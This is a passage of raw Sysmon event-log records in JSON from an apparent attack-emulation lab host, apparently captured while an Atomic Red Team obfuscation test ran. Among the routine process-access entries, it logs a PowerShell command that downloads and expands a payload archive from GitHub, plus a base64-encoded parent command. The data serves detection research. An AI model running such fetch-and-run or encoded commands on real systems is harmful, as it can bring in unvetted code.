C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A4A03)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.015","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A4A03)","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4980,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4981,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.046\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nProcessId: 4112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ggitplxk.da1.ps1\r\nCreationUtcTime: 2020-08-01 05:52:38.046","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.046","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010EEE40700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ggitplxk.da1.ps1","CreationUtcTime":"2020-08-01 05:52:38.046","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4982,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.078\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.078","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4983,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.078\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.078","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4984,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.225\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nProcessId: 4944\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \\\"\"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip\\\"\" -OutFile \\\"\"$env:temp\\T1027.zip\\\"\"\nExpand-Archive -path \\\"\"$env:temp\\T1027.zip\\\"\" -DestinationPath \\\"\"$env:temp\\temp_T1027.zip\\\\\"\" -Force} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.225","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010E3F20700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \\\"\"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip\\\"\" -OutFile \\\"\"$env:temp\\T1027.zip\\\"\"\nExpand-Archive -path \\\"\"$env:temp\\T1027.zip\\\"\" -DestinationPath \\\"\"$env:temp\\temp_T1027.zip\\\\\"\" -Force} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4985,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977435cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977c5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977712fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010E3F20700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977435cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977c5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b7